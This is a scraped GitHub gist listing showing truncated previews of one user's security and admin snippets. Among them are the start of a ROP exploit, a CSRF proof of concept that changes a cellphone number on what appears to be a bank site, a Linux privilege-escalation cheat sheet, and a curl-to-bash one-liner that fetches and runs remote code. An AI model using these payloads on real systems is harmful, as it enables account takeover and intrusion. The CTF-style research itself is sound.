Skip to content

Instantly share code, notes, and snippets.

Avatar
🐗
æ

cedric cedriczirtacic

🐗
æ
View GitHub Profile
View decrypt_main.py
import sys
path = sys.argv[1]
main_addr = 0x1faf
main_size = 1749
main_real = ''
main = ''
key = "a15abe90c112d09369d9f9da9a8c046e"
key_len = len(key)
@cedriczirtacic
cedriczirtacic / attributes.rb
Created Apr 20, 2019 — forked from lizthegrey/attributes.rb
Hardening SSH with 2fa
View attributes.rb
default['sshd']['sshd_config']['AuthenticationMethods'] = 'publickey,keyboard-interactive:pam'
default['sshd']['sshd_config']['ChallengeResponseAuthentication'] = 'yes'
default['sshd']['sshd_config']['PasswordAuthentication'] = 'no'
View tor_ssh.sh
#!/bin/bash
# TOR Setup Script
# Author: Nick Busey
#
# This file is meant to get SSH access via Tor to an Ubuntu server in one command.
#
# Quick Usage (as root): $ bash <(curl -s https://gitlab.com/grownetics/devops/raw/master/tor_ssh.sh)
#
# Usage for the paranoid:
@cedriczirtacic
cedriczirtacic / wol.py
Created Feb 12, 2019
wake-on-lan using scapy
View wol.py
from scapy.sendrecv import send
from scapy.layers.inet import *
from binascii import unhexlify
import sys
magic = ''
for h in sys.argv[1].split(':'): magic += unhexlify(h);
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16)))
@cedriczirtacic
cedriczirtacic / vm_admin.sh
Last active Feb 4, 2019
quick VBox (headless) admin script
View vm_admin.sh
#!/bin/bash
# cedric
# XXX: this is how I prefer to stop a VM, change this at will
PREFERRED_STOP_METHOD="acpipowerbutton"
function perror() { echo -e $@ 1>&2; }
function vm_exists() {
local VM=$1
VBoxManage showvminfo "${VM}" >/dev/null 2>&1
return $?
View mymaths_solve.py
#!/usr/bin/python
import logging
from angr import *
from pwn import log
'''
[0x00001080]> afl~com
0x00001173 3 110 sym.comprueba_0
0x000011e1 3 112 sym.comprueba_1
0x00001251 3 116 sym.comprueba_2
@cedriczirtacic
cedriczirtacic / rop.py
Created Jan 14, 2019
Frolic rop exploit
View rop.py
#!/usr/bin/python
from struct import pack
def little(x):
return pack('<I', x)
buf_len = 52
libc_addr = 0xb7e19000
system_off = 0x0003ada0
View cell_bac_csrf.html
<html>
<head>
<script type="text/javascript" src="https://blue.baccredomatic.com/js/jquery-3.3.1.min.js"></script>
</head>
<body onload="change();">
<p>cellphone change poc</p>
<script type="text/javascript">
function change()
{
var paramsValues = {cellPhoneNumber: "12345678" };
View steghide.md

Compile steghide in macOS X

Check if gettext is installed, if not use Homebrew to get it:

$ brew install gettext

Get the gettext library and cpp flags, and configure with those flags:

$ brew info gettext | grep FLAGS
@cedriczirtacic
cedriczirtacic / linux_privesc
Created Jun 14, 2018 — forked from sckalath/linux_privesc
Linux Privilege Escalation Techniques
View linux_privesc
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs